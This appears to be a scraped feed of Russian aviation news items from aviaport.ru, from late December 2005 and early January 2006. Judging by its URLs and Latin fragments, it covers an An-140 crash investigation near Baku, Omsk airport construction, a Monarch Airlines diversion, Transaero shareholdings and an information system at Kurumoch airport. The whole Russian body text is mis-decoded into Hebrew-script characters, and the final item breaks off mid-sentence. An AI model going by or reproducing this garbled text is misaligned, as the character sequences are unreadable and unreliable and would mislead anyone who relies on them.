http://www.aviaport.ru/news/2006/01/02/99273.html - ֲ נוחףכעאעו ךנףרוםט ג ׁ״ְ, רעאע ְיהאץמ, קאסעםמדמ נואךעטגםמדמ סאלמכועא ןמדטבכט הגא קוכמגוךא, םאץמהטגרטץס םא ודמ במנעף - Mon, 02 Jan 2006 13:23:00 +0300 - County סממבשטכ זףנםאכטסעאל מ עמל, קעמ ג לטםףגרף‏ ןעםטצף ג נוחףכעאעו ךנףרוםט קאסעםמדמ נואךעטגםמדמ סאלמכועא ןמדטבכט הגא קוכמגוךא, םאץמהטגרטץס םא ודמ במנעף. ״ונטפ ףעמקםטכ, קעמ ךאעאסענמפא ןנמטחמרכא ג 15 ךטכמלוענאץ ך ‏דף מע לוסעםמדמ א‎נמןמנעא ׂנאךט, ג 14:00 ג ןעםטצף.ׁכףזב א‎נמןמנעא ןמהעגונהטכט, קעמ סאלמכוע קאסעםמי ךמלןאםטט, םא במנעף ךמעמנמדמ םאץמהטכטס, ןמ נאחםמי טםפמנלאצטט, רוסע טכט גמסול קוכמגוך, םאןנאגככס ג א‎נמןמנע ׂנאךט טח ׂגטם-װמככח, רעאע ְיהאץמ. ֿמ םוגסםוםםל ןמךא ןנטקטםאל, לארטםא נוחךמ טחלוםטכא ךףנס, א חאעול סגח ס םוי ןנמןאכא מךמםקאעוכםמ.ֽאןנאגכוםםו םא לוסעמ ןמסכוהםודמ נאהטמסטדםאכא סןאסאעוכט מבםאנףזטכט דמנשטו מבכמלךט סאלמכועא. ֿמךא םוע עמקםמי טםפמנלאצטט מ עמל, קעמ ןנמטחמרכמ ס מסעאכםלט קכוםאלט ‎ךטןאזא, ט ןאססאזטנאלט, םאץמהטגרטלטס םא במנעף סאלמכועא. ֲ םאסעמשוו גנול ןמ האםםמלף הוכף גוהועס נאססכוהמגאםטו. - - - - - ׳טםטע סאלמכוע נאחנורטכט גסול זוכא‏שטל - http://www.aviaport.ru/news/2006/01/02/99272.html - ׁ 1 םגאנ 2006 דמהא ג ׀מססטט גסעףןטכ ג סטכף חאךמם, מעלום‏שטי מבחאעוכםמו כטצוםחטנמגאםטו 50 גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט - Mon, 02 Jan 2006 13:22:00 +0300 - ׁ 1 םגאנ 2006 דמהא ג ׀מססטט גסעףןטכ ג סטכף חאךמם, מעלום‏שטי מבחאעוכםמו כטצוםחטנמגאםטו 50 גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט, סממבשאוע ׀ְָ "ֽמגמסעט". עמע זו חאךמם הוכאוע מבחאעוכםל כטצוםחטנמגאםטו םוסךמכךטץ גטהמג הועוכםמסעט, הכ ךמעמנץ נאםוו סןוצטאכםץ נאחנורוםטי םו ענובמגאכמס. ֲ קאסעםמסעט - טדמנםמדמ בטחםוסא.ׁמדכאסםמ גסעףןטגרולף ג סטכף המךףלוםעף, עוןונ םו םףזםמ ןמכףקאע כטצוםחט‏ ןנוהןנטםטלאעוכל, מךאחגא‏שטל ףסכףדט ג ספונו עףנטחלא. ׂאךזו כטצוםחט םו ןמםאהמבטעס הכ ןונוגמחךט ןאססאזטנמג כודךמגל אגעמענאםסןמנעמל, ןנמטחגמהסעגא עאבאקםץ טחהוכטי, עוץםטקוסךמדמ מבסכףזטגאםט גמחהףרםץ סףהמג, ‎ךסןכףאעאצטט םופעוהמבגא‏שטץ ןנמטחגמהסעג ט ענאםסןמנעא םופעט ט דאחא.ֽומבץמהטלמסע ןמכףקוםט כטצוםחטי םא מהםט גטה הועוכםמסעט מעלוםועס ס 1 םגאנ 2006 דמהא, םא הנףדטו - ס 1 םגאנ 2007 דמהא, א הכ מסעאכםץ גטהמג ןנוהןנטםטלאעוכסךמי הועוכםמסעט - עמכךמ ןמסכו גסעףןכוםט ג סטכף סממעגועסעגף‏שטץ עוץםטקוסךטץ נודכאלוםעמג.ׂאךזו חאךמם ףןנמשאוע ןמכףקוםט כטצוםחטי ט ףעמקםוע ןמכםמלמקט סממעגועסעגף‏שטץ פוהונאכםץ מנדאםמג גכאסעט. - - - - - װוהמנמגךו ןמהבונףע ןמהנהקטךא - http://www.aviaport.ru/news/2006/01/02/99271.html - ׳טםמגםטךט ןנאגטעוכסעגא ־לסךמי מבכאסעט םאחמגףע דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא םמגמדמ א‎נמןמנעא ־לסך-װוהמנמגךא - Mon, 02 Jan 2006 13:08:00 +0300 - אך סעאכמ טחגוסעםמ "", סודמהם קטםמגםטךט ןנאגטעוכסעגא ־לסךמי מבכאסעט םאחמגףע דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא םמגמדמ א‎נמןמנעא ־לסך-װוהמנמגךא. ֽמגו גמחהףרםו גמנמעא ־לסךא, םא חאגונרוםטו סענמטעוכסעגא ךמעמנץ ןמענובףועס במכוו 5 לכנה נףב., בףהףע גגוהום ג ‎ךסןכףאעאצט‏ ףזו ג 2008 דמהף. ַא ןמכףקוםטו דוםונאכםמדמ ןמהנהא, סעמטלמסע ךמעמנמדמ עמכךמ ג סכוהף‏שול דמהף ןנוגסטע 1 לכנה נףב., ןמסןמנע מלסךטו סענמטעוכםו ךמלןאםטט ־־־ "ֿׁװ "ֿמכוע ט " ט ־־־ "ֽֿ־ "ּמסעמגטך",א עאךזו ע‏לוםסךא ְַ־ "ְ‎נמהנמלהמנסענמי".ֳוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא א‎נמןמנעא ־לסך-װוהמנמגךא סןוצטאכםא ךמםךףנסםא ךמלטססט ןנאגטעוכסעגא ֿנטטנער מןנוהוככא גקונא המ ןמחהםודמ גוקונא. "ֲ עוםהונו ןנטםטלא‏ע ףקאסעטו מלסךטי פטכטאכ ע‏לוםסךמדמ ְַ־ "ְ‎נמהנמלהמנסענמי", א עאךזו לוסעםו סענמטעוכםו ךמלןאםטט ־־־ ֿׁװ "ֿמכוע ט ", ט ־־־ ֽֿ־ "ּמסעמגטך", - נאססךאחאכ םאקאכםטך ףןנאגכוםט לטםטסעונסעגא ןנמלרכוםםמי ןמכטעטךט, ענאםסןמנעא ט סגחט ןנאגטעוכסעגא ־לסךמי מבכאסעט ְכוךסאםהנ ֿףרךאנוג. ֿמ ודמ סכמגאל, ןנועוםהוםע םא ןמכףקוםטו דוםונאכםמדמ ןמהנהא המכזם בכט המךאחאע, קעמ מבכאהא‏ע גסולט םומבץמהטללט ךאהנמגלט ט עוץםטקוסךטלט גמחלמזםמסעלט הכ גוהוםט סעמכ לאסרעאבםמי סענמיךט.ֽאןמלםטל, מב אךעטגםמל ףקאסעטט מבכאסעםץ גכאסעוי ג סענמטעוכסעגו םמגמדמ א‎נמןמנעא דףבונםאעמנ ֻומםטה ֿמכוזאוג חאגטכ 8 הוךאבנ עוךףשודמ דמהא םא חאסוהאםטט אנץטעוךעףנםמ-דנאהמסענמטעוכםמדמ סמגועא נודטמםא. "7 םמבנ 2008 דמהא ל גחכועטל ס א‎נמןמנעא װוהמנמגךא. ֽףזםמ סעאגטע ןונוה סמבמי סונוחםו חאהאקט", - ןממבושאכ עמדהא דףבונםאעמנ.ֽא סענמטעוכסעגמ םמגמדמ א‎נמןמנעא ךאחםא ֿנטטנער ג בףהףשול דמהף ןמענאעטע 1 לכנה נףב. אך סממבשטכ ט. מ. לטםטסענא פטםאםסמג ־לסךמי מבכאסעט ּטץאטכ ֶהאםמג, נאסץמה םא גמחגוהוםטו א‎נמןמנעא ןמךא םו חאכמזום מעהוכםמי סענמךמי ג ב‏הזועו ֿנטטנער םא 2006 דמה. "עא סעאע בףהוע ןנמפטםאםסטנמגאםא חא סקוע המןמכםטעוכםץ המץמהמג ךאחם טכט ןונונאסןנוהוכוםט קאסעט נאסץמהמג םא םוןנטמנטעועםו חאהאקט", - סממבשטכ דמסןמהטם ֶהאםמג.ֲמחגוהוםטו ג ־לסךו א‎נמןמנעא װוהמנמגךא םאקאכמס ג 1982 דמהף. ׁהאקא מבתוךעא ג סענמי בכא חאןכאםטנמגאםא םא 1993 דמה. ־הםאךמ פטםאםסטנמגאםטו סענמטעוכסעגא בכמ ןנוךנאשוםמ ג םאקאכו 90-ץ דמהמג, ך ‎עמלף גנולוםט גחכועםמ-ןמסאהמקםא ןמכמסא ט מבתוךע טםפנאסענףךעףנ בכט דמעמג םא 65%. ֲ םאסעמשטי למלוםע םוהמסענמוםםי א‎נמןמנע נאסןמכאדאוע גחכועםמי ןמכמסמי הכטםמי 2930 ל ט ךמעוכםמי למשםמסע‏ 54 ֲּע. א‎נמןמנעף ןמהגוהום גמהמגמה, ‎כוךענמסועט, דאחמןנמגמה ט זוכוחםמהמנמזםא לאדטסענאכ.װטםאםסטנמגאםטו סענמטעוכסעגא םאקםועס ןמסכו עמדמ, ךאך קטםמגםטךט נוראע גמןנמס ס ןונוגמהמל װוהמנמגךט ג נודטמםאכםף‏ סמבסעגוםםמסע. "ׁויקאס ל ףזו מבנאעטכטס ג נמססטיסךמו אדוםעסעגמ "׀מסטלףשוסעגמ". ָ ןמךא ‎עא ןנמצוהףנא (ןונוהאקא ג סמבסעגוםםמסע נודטמםא. - "") םו בףהוע ןנמגוהוםא, ך סענמטעוכסעגף א‎נמןמנעא ל ןנטסעףןאע םו בףהול. ּ םו סמלםוגאולס, קעמ גסו םומבץמהטלו בףלאדט בףהףע מפמנלכום ג ןונגמל ךגאנעאכו סכוהף‏שודמ דמהא", - ןמהוכטכס ןנמדםמחמל ְכוךסאםהנ ֿףרךאנוג. ֿמ ודמ האםםל, סמגמךףןםו חאענאע ןמ חאגונרוםט‏ סענמטעוכסעגא םמגמדמ מלסךמדמ א‎נמןמנעא סמסעאגע במכוו 5 לכנה נףב. ֿמ סכמגאל ט. מ. דוםונאכםמדמ הטנוךעמנא ־ְ־ "־לסך-װוהמנמגךא" ֲאכונט ֿמןמגא, המ 65% מע מבשודמ מבתולא פטםאםסטנמגאםט ג בףהףשול דמהף בףהוע םאןנאגכוםמ םא נוךמםסענףךצט‏ גחכועםמ-ןמסאהמקםמי ןמכמס. "ׁויקאס םףזםמ מבוסןוקטע בוסןונובמיםמו סםאבזוםטו סענמטעוכםמי ןכמשאהךט גמהמי ט ‎כוךענטקוסעגמל, ןמהדמעמגטע לוסעא הכ נאחלושוםט כ‏הוי ט עוץםטךט, קעמב ג אןנוכו למזםמ בכמ ןנטסעףןטע ך אךעטגםמלף סענמטעוכסעגף", - סממבשטכ דמסןמהטם ֿמןמג.־זטהאועס, קעמ נוחףכעאע ךמםךףנסא ןמ מןנוהוכוםט‏ דוםונאכםמדמ ןמהנהקטךא סענמטעוכסעגא א‎נמןמנעא ־לסך-װוהמנמגךא קטםמגםטךט מבםאנמהף‏ע סודמהם. - - - - - ֿנמטחגמהטעוכט ְם-140 סמדכאסם ס גגמהאלט ךמלטססטט - http://www.aviaport.ru/news/2006/01/02/99270.html - ֿנוהסעאגטעוכט ױְֳֿֿ ןמהעגונהטכט, קעמ סמדכאסם סמ גסולט גגמהאלט, ך ךמעמנל ןנטרכא ךמלטססט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא ְם-140 - Mon, 02 Jan 2006 13:05:00 +0300 - ֲקונא ןנוהסעאגטעוכט ױאנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ ןנוהןנטעט (ױְֳֿֿ) ןמהעגונהטכט, קעמ סמדכאסם סמ גסולט גגמהאלט, ך ךמעמנל ןנטרכא ךמלטססט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא ְם-140, ג נאבמעו ךמעמנמי ןנטםטלאכ ףקאסעטו ױְֳֿֿ. ֿמסכו מבםאנמהמגאםט ןונגץ נוחףכעאעמג נאססכוהמגאםט ג םוךמעמנץ ָּׁ ןמגטכאס טםפמנלאצט מ עמל, קעמ ןנמטחגמהטעוכט נאחבטגרודמס סאלמכועא םו נאחהוכ‏ע לםוםטו ךמלטססטט. ֲקונא ‎עא טםפמנלאצט בכא מןנמגונדםףעא הוןאנעאלוםעמל ןמ סגחל ס מבשוסעגוםםמסע‏ ױְֳֿֿ.מלטססט, ג סמסעאג ךמעמנמי גמרכט ןנוהסעאגטעוכט ְֽׂ טל. ְםעמםמגא (נאחנאבמעקטך סאלמכועא), ַאןמנמזסךמדמ לארטםמסענמטעוכםמדמ ךמםסענףךעמנסךמדמ ב‏נמ "ֿנמדנוסס" (נאחנאבמעקטך הגטדאעוכ), ױְֳֿֿ ט חאןמנמזסךמי ךמלןאםטט "ּמעמנ ׁטק" (ןנמטחגמהטעוכ הגטדאעוכוי), נאסרטפנמגאג "קונםי שטך" ןנטרכא ך גגמהף, קעמ םא גסמעו 2100 ל סאלמכוע םאקאכ סםטזוםטו ןמ סןטנאכט, סמגונרטג קוענו גטעךא. ׳ונוח םוסךמכךמ סוךףםה סגח ס ‎ךטןאזול ןנמןאכא, ןמסכו קודמ סאלמכוע טסקוח ס נאהאנמג. ֿונגו נוחףכעאע נאססכוהמגאםט ןמךאחאכט, קעמ הגטדאעוכט סאלמכועא, סטסעול ףןנאגכוםט ט ‎םונדמסםאבזוםט בכט טסןנאגם. ֿנטקטםמי ךאעאסענמפ למדכא סעאע םוטסןנאגםמסע אגטאדמנטחמםעמג - ןנטבמנמג, ןמךאחגא‏שטץ ןמכמזוםטו סאלמכועא ג ןנמסענאםסעגו.ֽאןמלםטל, קעמ 23 הוךאבנ ןמה ֱאךף ןנמטחמרכמ ךנףרוםטו סאלמכועא ץאנךמגסךמדמ ןנמטחגמהסעגא ְם-140, גןמכםגרודמ נויס ֱאךף - ְךעאף. ֲ נוחףכעאעו ךאעאסענמפ ןמדטבכט 23 קוכמגוךא. ֿנאגטעוכסעגמ ְחונבאיהזאםא ןנטמסעאםמגטכמ ‎ךסןכףאעאצט‏ סאלמכועמג ְם-140 המ מךמםקאםט נאססכוהמגאםט ןנטקטם ךאעאסענמפ. - - - - - ׀מבטםחמם "ןמםוגמכו" - http://www.aviaport.ru/news/2006/01/02/99268.html - ֶטעוכ ֲוכטךמבנטעאםטט, זוכאגרטי גסענועטע ֽמגי דמה ג ךמלןאםטט הנףחוי םא מסענמגו ׂוםונופו, ןמןאכ ג חאענףהםטעוכםף‏ סטעףאצט‏, סעאג "׀מבטםחמםמל ןמםוגמכו" - Mon, 02 Jan 2006 13:03:00 +0300 - ֶטעוכ ֲוכטךמבנטעאםטט, סענאסעםמ זוכאגרטי גסענועטע ֽמגי דמה ג ךמלןאםטט הנףחוי םא טסןאםסךמל מסענמגו ׂוםונופו, ןמןאכ ג גוסלא חאענףהםטעוכםף‏ סטעףאצט‏, סעאג ןונוה ןנאחהםטךמל "׀מבטםחמםמל ןמםוגמכו".מלאםהטנ אגטאכאיםונא, סכוהמגאגרודמ נויסמל ZB-558 םא ׂוםונטפו טח ּאםקוסעונא, ןנטםכ נורוםטו סמגונרטע םוחאןכאםטנמגאםםף‏ ןמסאהךף, קעמב גסאהטע ןונוןטגרודמ גמ גנול נויסא ןאססאזטנא. ׂמע םאקאכ סךגונםמסכמגטע ג אהנוס ןאססאזטנמג ט ךמלאםה, ןנמטדםמנטנמגאג ענובמגאםטו ףסןמךמטעס. ֲ ‎עמע למלוםע כאיםונ, םא במנעף ךמעמנמדמ םאץמהטכטס 210 קוכמגוך, כועוכ םא גסמעו מךמכמ 10 ךטכמלוענמג.ָ ץמע המ ׂוםונטפו מסעאגאכמס גסודמ 45 לטםףע ןמכועא, ‎ךטןאז ןנטרוכ ך גגמהף, קעמ ןנטסףעסעגטו ןםמדמ עףנטסעא ףדנמזאוע בוחמןאסםמסעט ןמכועא. ָ נורטכ סמגונרטע םוחאןכאםטנמגאםםף‏ ןמסאהךף, קעמב גסאהטע בנטעאםצא םא ךנמרוקםמל מסענמגךו ֿמנעמ-ׁאםעמ, נאסןמכמזוםםמל םוהאכוךמ מע סוגונםמדמ ןמבונוז ְפנטךט.ׁףה ןמ גסולף, ֽמגי דמה ולף ןנטהועס גסענועטע םא ‎עמל מסענמגךו ס םאסוכוםטול ג קוענו עסקט קוכמגוך. ַהוס םוע ךאחטםמ ט םמקםץ ךכףבמג. ְ והטםסעגוםםל נאחגכוקוםטול לוסעםץ זטעוכוי מסעא‏עס עמכךמ ןנמדףכךט ןמ ןוסקאםל ה‏םאל. ֿנאגהא, טלוםםמ םא ‎עמל מסענמגו, סמדכאסםמ ןנוהאםטל, םוסךמכךמ סעמכועטי םאחאה בףהףשטי ןונגממעךנגאעוכ ְלונטךט ױנטסעמפמנ מכףלב ןמחםאךמלטכס סמ סגמוי בףהףשוי זוםמי. ׂאך ֿמנעמ-ׁאםעמ גמרוכ ג טסעמנט‏.ֲןנמקול, ף בנטעאםסךמדמ "׀מבטםחמםא" ושו מסעאועס ראםס המבנאעס ך ןנאחהםטךף םא ׂוםונטפו. ֿנאגהא, עוןונ ולף ןנטהועס גבטנאע: כטבמ מעןנאגטעס םא מסענמג ּאהוינא םא ןאנמלו ט ףזו מעעףהא ןונוסוסע םא הנףדמי סאלמכוע המ לוסעא םאחםאקוםט, כטבמ גונםףעס המלמי ג ְםדכט‏.ְגטאךמלןאםט Monarch Airlines ןמךא ושו םו נורטכא, ןמהאגאע כט ג סףה םא םוחאהאקכטגמדמ בנטעאםצא ג סגחט ס םוחאןכאםטנמגאםםל טחלוםוםטול לאנרנףעא, ךמעמנמו, ןמ סכמגאל ןנוהסעאגטעוכ ךמלןאםטט, מבמרכמס וי ג םוסךמכךמ עסק פףםעמג סעונכטםדמג.סעאעטֽוסלמענ םא קוענוץקאסמגף‏ חאהונזךף, ןאססאזטנ ןמכםמסע‏ ןמההונזאכט נורוםטו ‎ךטןאזא גסאהטע סךגונםמסכמגא. אך סממבשטכא ִזמ ׀מבונעסמם, ןנוהסעאגטעוכ אגטאךמלןאםטט Monarch Airlines, םאנףרטעוכ‏ סןמךמיסעגט ןנוהכמזטכט ןמהןטסאע ןנמעמךמכ, דהו בכ חאפטךסטנמגאם פאךע ודמ םוןמהמבא‏שודמ ןמגוהוםט, מהםאךמ עמע מעךאחאכס ‎עמ סהוכאע. - - - - - ֲמחהףרםמו ןנמסענאםסעגמ ױאבאנמגסךא ןףסעףוע - http://www.aviaport.ru/news/2006/01/02/99269.html - ֿונגמדמ םגאנ טח ױאבאנמגסךא םו גכועטע םט מהטם סאלמכוע. ָח ױאבאנמגסךא ג ןונגי הום דמהא למזםמ גבנאעס עמכךמ ןמוחהמל, א עאךזו אגעמענאםסןמנעמל - Mon, 02 Jan 2006 13:03:00 +0300 - ֿונגמדמ םגאנ טח ױאבאנמגסךא םו גכועטע םט מהטם סאלמכוע. ֲמע ךאך ןנמךמללוםעטנמגאכט סטעףאצט‏ ךמננוסןמםהוםעף ְָ REGNUM ג הטסןועקונסךמי ױאבאנמגסךמדמ א‎נמןמנעא: "ׁודמהם םט מהטם סאלמכוע טץ ױאבאנמגסךא םו גכועטע. ׂאךא סטעףאצט ג ױאבאנמגסךו גןונגו. ׁאלמכוע טח דמנמהא םו גכועא‏ע םו ןמ ןנטקטםו םוטסןנאגםמסעט, א ןמ ןנטקטםו מעסףעסעגט נויסמג. ־ע םאס ג ֽמגי דמה םטךעמ םטךףהא םו כועטע. ְגטאעמנ מעהץא‏ע".ָח ױאבאנמגסךא ג ןונגי הום דמהא למזםמ גבנאעס עמכךמ ןמוחהמל, א עאךזו אגעמענאםסןמנעמל. - - - - - "ׂנאםסא‎נמ" נאסךנכמ סענףךעףנף אךצטמםונםמדמ ךאןטעאכא - http://www.aviaport.ru/news/2005/12/29/99267.html - ־ְ־ "ְגטאךמלןאםט "ׂנאםסא‎נמ" נאסךנכמ סענףךעףנף סגמודמ אךצטמםונםמדמ ךאןטעאכא. 32,1% אךצטי ךמםענמכטנףוע "ֻמדמְֲַ-ֻ", 44,1% גכאהו‏ע קכום סולט ְ. ֿכוראךמגא - Thu, 29 Dec 2005 17:30:00 +0300 - ־ְ־ "ְגטאךמלןאםט "ׂנאםסא‎נמ" נאסךנכמ סענףךעףנף סגמודמ אךצטמםונםמדמ ךאןטעאכא. אך סכוהףוע טח מפטצטאכםץ לאעונטאכמג ךמלןאםטט, 32,1% אךצטי ךמםענמכטנףוע "ֻמדמְֲַ-ֻ", 44,1% גכאהו‏ע קכום סולט ןנוהסוהאעוכ סמגועא הטנוךעמנמג "ׂנאםסא‎נמ" ְכוךסאםהנא ֿכוראךמגא. "ֻמדמְֲַ-ֻ", ףקנוזהוםםי ג 1996 דמהף ךמלןאםטוי "ֻמדמְֲַ", ךמםענמכטנףוע אךצטט "ׂנאםסא‎נמ" קונוח סגמט המקונםטו סענףךעףנ - ְַ־ ֱמנוי-2" ט ְַ־ "׀אעלטנ+". ֿמ האםםל טסעמקםטךא "ָםעונפאךסא" ג אגטאצטמםםמי מענאסכט, סויקאס "ֻמדמְֲַ-ֻ" ףזו םו ןנטםאהכוזטע "ֻמדמְֲַף".ׁמדכאסםמ המךףלוםעף, ןנוהסוהאעוכ‏ סמגועא הטנוךעמנמג "ׂנאםסא‎נמ" ְכוךסאםהנף ֿכוראךמגף ןנטםאהכוזטע 32,81% מבךםמגוםםץ אךצטי, א ודמ סףןנףדו, דוםונאכםמלף הטנוךעמנף ְ־ ־כדו ֿכוראךמגמי - 8,08%. נמלו עמדמ, 3,25% אךצטי "ׂנאםסא‎נמ" ןנטםאהכוזאע לאעונט ֿכוראךמגא, ןנוהסוהאעוכ‏ ּוזדמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ךמלטעועא ׂאעםו ְםמהטםמי.־ְ־ "ְגטאךמלןאםט "ׂנאםסא‎נמ" ןמ ןאססאזטנממבמנמעף גץמהטע ג קטסכמ ןעט ךנףןםוירטץ נמססטיסךטץ אגטאךמלןאםטי. ֲנףקךא מע נואכטחאצטט חא 11 לוסצוג 2005 דמהא - 8,9 לכנה נףבכוי, ןאססאזטנממבמנמע - 4,8 לכנה ןאססאזטנמ-ךטכמלוענמג. - - - - - ֲ א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא סןנאגמקםא סטסעולא TouchTown (ׁאלאנא) - http://www.aviaport.ru/news/2005/12/29/99266.html - ֲ ּוזהףםאנמהםמל א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא ָםפמנלאצטמםםמ-סןנאגמקםא סטסעולא TouchTown - Thu, 29 Dec 2005 17:27:00 +0300 - ֲ ּוזהףםאנמהםמל א‎נמןמנעף "ףנףלמק" םאקאכא הויסעגמגאע םמגא ָםפמנלאצטמםםמ-סןנאגמקםא סטסעולא TouchTown, - סממבשטכט ךמננוסןמםהוםעף ְָ REGNUM-ֲמכדאָםפמנל ג ןנוסס-סכףזבו א‎נמןמנעא. ֳכאגםל המסעמטםסעגמל סטסעול גכועס מןונאעטגםמו ןנוהמסעאגכוםטו םומבץמהטלמי ןאססאזטנף טםפמנלאצטט ס טסןמכחמגאםטול בוחדנאםטקםץ גמחלמזםמסעוי לףכעטלוהטא. ׂוןונ אגטאןאססאזטנ ןנט ןמלמשט סוםסמנםמדמ עונלטםאכא למדףע ןמכףקטע ןנאךעטקוסךט כ‏בף‏ טםפמנלאצט‏ םו עמכךמ מב א‎נמןמנעו, םמ ט ןמ ׁאלאנו ג צוכמל. ׂאך, האםםו סטסעול "TouchTown" ןמהוכום םא הגא בכמךא: "ֿףעוגמהטעוכ ןמ ּוזהףםאנמהםמלף א‎נמןמנעף "ףנףלמק" (חהוס ןאססאזטנ למדףע ןמחםאךמלטעס ס ןכאםמל ןמלושוםטי א‎נמןמנעא ט ןנטכודא‏שוי ך םולף עוננטעמנטט, א עאךזו ףחםאע מ ןנוהמסעאגכולץ ףסכףדאץ) ט "ֲס ׁאלאנא" (ג בכמךו סמהונזטעס טםפמנלאצט מ דמסעטםטצאץ, לוסעאץ מעהץא, נאחגכוךאעוכםץ ט עמנדמגץ צוםענאץ, ךמלןאםטץ, מךאחגא‏שטץ נאחכטקםו ןמענובטעוכסךטו ףסכףדט). - - - - - ױְֳֿֿ ןנטחגאוע זףנםאכטסעמג בע לאךסטלאכםמ ךמננוךעםלט ג סממבשוםטץ מ נאבמעו ךמלטססטט ןמ נאססכוהמגאםט‏ ןנטקטם ךאעאסענמפ סאלמכועא ְם-140-100 - http://www.aviaport.ru/news/2005/12/29/99265.html - ֲ ֱאךף סמסעמכאס ןנוסס-ךמםפונוםצט ןמ טעמדאל ןנוהגאנטעוכםמדמ נאססכוהמגאםט ןנטקטם ךאעאסענמפ סאלמכועא ְם-140-100 - Thu, 29 Dec 2005 17:18:00 +0300 - 28 הוךאבנ 2005 ד. ג ֱאךף סמסעמכאס ןנוסס-ךמםפונוםצט ןמ טעמדאל ןנוהגאנטעוכםמדמ נאססכוהמגאםט ןנטקטם ךאעאסענמפ סאלמכועא ְם-140-100. ־ נוחףכעאעאץ נאבמע המכמזטכט מע טלוםט ךמלטססטט ןמ נאססכוהמגאםט‏ ִזאץאםדטנ ְסךונמג - דוםונאכםי הטנוךעמנ דמסףהאנסעגוםםמדמ ךמםצונםא AZAL, ֿאגוכ ֽאףלוםךמ - דוםונאכםי הטנוךעמנ ױאנךמגסךמדמ דמסףהאנסעגוםםמדמ אגטאצטמםםמדמ ןנמטחגמהסעגוםםמדמ ןנוהןנטעט, ֱמנטס ֳמנ‏םמג - ןנוהסעאגטעוכ ּוזדמסףהאנסעגוםםמדמ ְגטאצטמםםמדמ מלטעועא, ֲטעאכטי ּטשוםךמ - הטנוךעמנ הוןאנעאלוםעא טםסןוךעטנמגאםט בוחמןאסםמסעט ןמכועמג ֳמסאגטאסכףזב ׃ךנאטם, ָכדאל ְלטנמג - ןנוהסוהאעוכ עוץםטקוסךמי ךמלטססטט ןמ נאססכוהמגאםט‏ ךאעאסענמפ. ֲמ גנול ןנוסס-ךמםפונוםצטט בכא מדכארוםא סכוהף‏שא טםפמנלאצט.23 הוךאבנ 2005 ד. ןמסכו גכועא טח א‎נמןמנעא ֱאךף ןמעונןוכ ךאעאסענמפף ג נאימםו ןמסוכךא ֽאנהאנאם םא ןמבונוזו אסןטיסךמדמ למנ סאלמכוע ְם-140-100 (םאצטמםאכםי ט נודטסענאצטמםםי חםאך 4-AZ48) ֽאצטמםאכםמי אגטאךמלןאםטט "ְחונבאיהזאם ױאגא ֹמככאנ". ׁאלמכוע, גןמכםגרטי נויס AHY 217 ןמ לאנרנףעף ֱאךף (ְחונבאיהזאם) - ְךעאף (אחאץסעאם) טלוכ םא במנעף 18 ןאססאזטנמג ט 5 קכוםמג ‎ךטןאזא (ךמלאםהטנ ֻאגנטם ְ.ְ.). ֲ נוחףכעאעו ךאעאסענמפ ןמדטבכמ 23 קוכמגוךא, םאץמהטגרטץס ג סאלמכועו, ג עמל קטסכו 5 קכוםמג ‎ךטןאזא ט 18 ןאססאזטנמג, סנוהט ךמעמנץ בכט דנאזהאםו ְחונבאיהזאםא (10), ְגסענאכטט (1), ֲוכטךמבנטעאםטט (1), ֳנףחטט (1), אחאץסעאםא (4), ט ׂףנצטט (1). ֲׁ ןמכםמסע‏ נאחנףרוםמ.ֲ נוחףכעאעו מנדאםטחמגאםםמדמ ןמטסךא מבכמלךט ֲׁ בכט מבםאנףזום םא בונודמגמי קונעו ג נאימםו םאסוכוםםמדמ ןףםךעא ֽאנהאנאם. ֿנמגוהוםטו אגאנטיםמ-סןאסאעוכםץ נאבמע מסכמזםכמס עולםל גנולוםול סףעמך ט םובכאדמןנטעםלט ןמדמהםלט ףסכמגטלט (םטחךא מבכאקםמסע, המזה, גועונ ט גמכםוםטו למנ). ןמטסךמגל נאבמעאל םולוהכוםםמ בכט ןנטגכוקום סטכ אגאנטיםמ-סןאסאעוכםץ סכףזב, ֲִּ, ֳמסףהאנסעגוםםמי ןמדנאםטקםמי סכףזב, ֳנאזהאםסךמי מבמנמם ׀וסןףבכטךט ְחונבאיהזאם. ֲ ץמהו נאבמע בכט ‎גאךףטנמגאם מסעאםךט גסוץ ןמדטברטץ. ֿנמהמכזא‏עס נאבמע ןמ ןמטסךף ט טחגכוקוםט‏ טח למנ פנאדלוםעמג ֲׁ.מלטססט ןמ נאססכוהמגאםט‏ אגטאךאעאסענמפ סאלמכועא ְם-140-100 4-AZ48, טחףקטג האםםו מבתוךעטגםמדמ ךמםענמכ, סםעו ס חאשטשוםםמדמ במנעמגמדמ םאךמןטעוכ ףסענמיסעגא נודטסענאצטט ֱ׃׀-92ְ, א עאךזו, סמןמסעאגטג טץ ס טםפמנלאצטוי הטסןועקונסךטץ סכףזב, לאעונטאכאלט, סמבנאםםלט םא לוסעו ךאעאסענמפ, גמססעאםמגטכא ןנוהגאנטעוכםמ סכוהף‏שף‏ ךאנעטםף סמבעטי.ֲחכוע סמסעמכס ג סממעגועסעגטט ס נאסןטסאםטול. ֽא ‎עאןו םאבמנא גסמע ןנמטחמרכמ ףךכמםוםטו גמחהףרםמדמ סףהםא (ֲׁ) מע ףסעאםמגכוםםמי ענאוךעמנטט ןמכועא. ַאעול ‎ךטןאז סממבשטכ סכףזבו ׃ֲִ מ עוץםטקוסךטץ ןנמבכולאץ םא במנעף ֲׁ. ׳ונוח םוסךמכךמ סוךףםה סגח ס ‎ךטןאזול ןנמןאכא, א מעלועךא ֲׁ טסקוחכא ס ‎ךנאםמג נאהאנא. ֿמ האםםל מבתוךעטגםמדמ ךמםענמכ ןמסכו םאבמנא גסמע המ 2100 ל סאלמכוע םאקאכ סםטזוםטו ןמ םטסץמהשוי סןטנאכט ס ףלוםרא‏שטלטס נאהטףסאלט מע 500 ל המ 100 ל, סמגונרטג ןנט ‎עמל 4,5 גטעךא.׀אסרטפנמגךא במנעמגמדמ ףסענמיסעגא נודטסענאצטט ןמךאחאכא, קעמ 